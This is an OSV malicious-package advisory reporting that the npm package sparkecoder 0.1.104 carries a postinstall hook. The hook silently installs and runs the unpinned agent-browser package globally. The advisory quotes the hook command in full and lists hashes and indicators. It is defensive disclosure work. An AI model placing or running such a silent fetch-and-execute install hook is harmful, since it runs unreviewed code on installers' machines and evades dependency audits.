MAL-2026-4673

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sparkecoder/MAL-2026-4673.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4673

Published

2026-05-21T05:44:29Z

Modified

2026-05-26T06:02:55.856572941Z

Summary

Malicious code in sparkecoder (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d4e17b053b29d371301e49a703b1b6d2fba5631df4bf7b6926503a6b8bb82257)

package.json declares a postinstall hook: "npm install -g agent-browser 2>/dev/null || true; agent-browser install 2>/dev/null || true". On npm install sparkecoder, this fetches whatever the current 'latest' version of the separate agent-browser package is on the npm registry, installs it globally (typically requiring elevated privileges), then invokes agent-browser install to run that package's own install-time logic. Both stderr and non-zero exit codes are suppressed (2>/dev/null || true), hiding any failure or output from the installer. The behavior is undocumented in the README. Because the dependency is unpinned and pulled transitively through a side channel (not via package.json dependencies), the installer's trust in sparkecoder is silently extended to whatever agent-browser ships today and at any future moment, with no version lock and no audit trail in the dependency tree. This is the namespace-abuse shape: sparkecoder itself is small, but installing it causes attacker- or third-party-controlled code from another package to execute on the installer's machine at install time, outside the normal dependency-resolution surface that lockfiles and audit tools inspect.

Database specific

{
    "malicious-packages-origins": [
        {
            "versions": [
                "0.1.104"
            ],
            "modified_time": "2026-05-21T05:44:29Z",
            "sha256": "682e2efcf4c2e75d9488a35060f8f9b37ef60903150a73270dc4743f87d306a1",
            "id": "IN-MAL-2026-003747",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:14.280912863Z"
        },
        {
            "versions": [
                "0.1.104"
            ],
            "modified_time": "2026-05-21T05:44:29Z",
            "sha256": "d4e17b053b29d371301e49a703b1b6d2fba5631df4bf7b6926503a6b8bb82257",
            "id": "IN-MAL-2026-003746",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:14.163958944Z"
        }
    ]
}

References

https://www.npmjs.com/package/sparkecoder/v/0.1.104

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / sparkecoder

Package

Name: sparkecoder; View open source insights on deps.dev
Purl: pkg:npm/sparkecoder

Affected ranges

Affected versions

0.*

0.1.104

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]

indicators

{
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-WrahAR6C9NYow9zASon3vAkrt4WU5godLIdK9KL0FCL1VBiiqcrAKsfqnkY+f95nN7tghGYT6As164q7Thoc3Q==",
                "sha1": "d7981d94f3540825990aff4b54a2c85c8bf910f5"
            },
            "filename": "sparkecoder-0.1.104.tgz"
        }
    ],
    "domains": [
        "34.7.16.104.in-addr.arpa"
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "tlsh": "0d61dd1ac9baccb32bc82594ac7b4556667248174d25bd0833c5431d8f4d2bf62fe36e",
            "sha256": "a9f7627c6590faa3b2621aecbf8bf613a04f702bcbcfb3501f5311c76180163b"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sparkecoder/MAL-2026-4673.json"